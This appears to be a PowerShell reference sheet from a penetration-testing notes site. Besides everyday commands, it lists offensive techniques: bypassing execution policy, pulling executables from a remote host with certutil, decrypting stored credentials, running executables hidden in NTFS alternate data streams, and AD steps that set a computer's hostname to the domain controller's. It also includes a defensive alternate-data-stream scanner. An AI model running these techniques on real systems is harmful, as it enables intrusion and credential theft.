PowerShell
Last modified: 2023-03-17
PowerShell is a task automation and configuration management program from Microsoft. PowerShell uses the Unicode UTF-16LE encoding by default.
Start PowerShell
On Linux
pwsh
# Execute a PS command without entering the shell.
pwsh -Command <cmdlet>
On Windows
powershell
# Bypass ExecutionPolicy
powershell -ep bypass
# Check the current policy
PS> Get-ExecutionPolicy
Commands
OS Information
$PSVersionTable
Change Directory
'cd' in Linux.
Set-Location -Path c:\Users\Administrator\Desktop
List Files
'ls' in Linux.
Get-ChildItem -File -Hidden
Get-ChildItem -File -Hidden -ErrorAction SilentlyContinue
Get-ChildItem -Directory -Hidden
Get-ChildItem -Directory -Hidden -Recurse -Filter '*secret*' -ErrorAction SilentlyContinue
Get-ChildItem -Path .\Desktop
Get-ChildItem -Recurse
View the Content of Files
'cat' in Linux.
Get-Content -Path example.txt
# 'cat | wc -l' in Linux
Get-Content -Path example.txt | Measure-Object -Line
# Print a single line by its zero-based index (here the 319th line)
(Get-Content -Path example.txt)[318]
Find Files
'find' in Linux.
Get-ChildItem -Path c:\ -Filter "*.txt" -Recurse 2>$null
Set Content to a File
'echo hello > example.txt' in Linux.
Set-Content -Path .\example.txt -Value hello
Download Web Content
'wget' in Linux.
Invoke-WebRequest -Uri http://10.0.0.1:8000/example.exe -OutFile .\example.exe
certutil -urlcache -f http://10.0.0.1:8000/example.exe example.exe
Copy Files
'cp' in Linux.
copy c:\Tools\example.exe \Users\michael\Documents\
Cryptography
# md5sum in Linux
Get-FileHash -Algorithm MD5 example.exe
CertUtil -hashfile example.exe MD5
# sha256sum in Linux
Get-FileHash -Algorithm SHA256 example.exe
CertUtil -hashfile example.exe SHA256
# sha512sum in Linux
Get-FileHash -Algorithm SHA512 example.exe
CertUtil -hashfile example.exe SHA512
XML Credential
A credential exported with Export-Clixml can be imported again and its plaintext password read back. On Windows the secret is protected with DPAPI, so this only works for the same user on the same machine that exported it.
# Decrypt a password in xml.
$Credential = Import-Clixml -Path .\example.xml
$Credential.GetNetworkCredential().password
Print Text Strings
'strings' in Linux.
.\Strings.exe -accepteula example.exe
Add New User
'useradd' in Linux.
New-LocalUser -Name "username" -Description "My first account" -NoPassword
# with password
$Password = Read-Host -AsSecureString
New-LocalUser -Name "username" -Password $Password -FullName "New User" -Description "My first account"
Show the Manual of Command
'man' or '--help' in Linux.
Get-Help Get-ChildItem
Get-Help Invoke-WebRequest
Create New File
'touch' in Linux.
New-Item example.txt
$null > example.txt
Create New Folder
'mkdir' in Linux.
mkdir example_folder
Remove Files
'rm' in Linux.
rm example.txt
rm -r example_folder
Reboot Computer
'reboot' in Linux.
Restart-Computer
NTFS (New Technology File System) ADS (Alternate Data Streams)
NTFS alternate data streams let a malware author hide data inside an existing file on an endpoint. List every stream attached to a file with:
Get-Item -Path file.exe -Stream *
To launch an executable hidden in an ADS, run the following command.
wmic process call create $(Resolve-Path example.exe:streamname)
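From the defender's side, the same stream enumeration can be turned into a sweep of a directory tree. This is an added example, not code from the original page; it assumes a Windows host with NTFS, treats the file's own ':$DATA' stream and the browser 'Zone.Identifier' mark-of-the-web as benign (a constructed allow-list), and flags any other stream whose first bytes are the 'MZ' PE signature.

```powershell
# Added example, not from the original page. Walks a directory tree, lists every
# alternate data stream, and reports streams that are not on a small allow-list.
# Streams beginning with the PE signature 'MZ' are flagged as hidden executables.
function Find-SuspiciousAds {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Constructed allow-list: the file's own data stream and the browser
        # "mark of the web" are expected; anything else is worth a look.
        [string[]] $IgnoreStreams = @(':$DATA', 'Zone.Identifier')
    )

    # -Force includes hidden files; access-denied errors are skipped silently.
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            # -Stream * returns one object per stream, including the main one.
            Get-Item -LiteralPath $file -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $IgnoreStreams -notcontains $_.Stream } |
                ForEach-Object {
                    $stream = $_.Stream
                    # Read the first two bytes of the stream. The byte-reading
                    # switch differs between Windows PowerShell 5.1 and PowerShell 7.
                    if ($PSVersionTable.PSVersion.Major -ge 6) {
                        $head = @(Get-Content -LiteralPath $file -Stream $stream -AsByteStream -TotalCount 2)
                    } else {
                        $head = @(Get-Content -LiteralPath $file -Stream $stream -Encoding Byte -TotalCount 2)
                    }
                    $isPe = ($head.Count -ge 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)

                    [PSCustomObject]@{
                        File        = $file
                        Stream      = $stream
                        Length      = $_.Length
                        LooksLikePE = $isPe
                    }
                }
        }
}

# Usage: list non-standard streams under a directory, likely executables first.
Find-SuspiciousAds -Path 'C:\Users\Public' |
    Sort-Object LooksLikePE -Descending |
    Format-Table -AutoSize
```

Hashing a flagged stream for lookup works the same way as the Cryptography section above, using Get-Content with -Stream to read the hidden data.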
Active Directory
# List all domain objects in AD (Get-Domain*/Get-Net* come from PowerView; Get-ADComputer/Set-ADComputer from the ActiveDirectory RSAT module)
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
# List all domain controllers in AD
Get-DomainController
# List all computers in the network
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
# Get the computer object that is joined to the Active Directory domain
Get-ADComputer <PC-NAME> -Properties dnshostname,serviceprincipalname
# Remove the current SPN attribute
Set-ADComputer <PC-NAME> -ServicePrincipalName @{}
# Set new DNS hostname to that of the DC
Set-ADComputer <PC-NAME> -DnsHostName VULNDC.vuln.local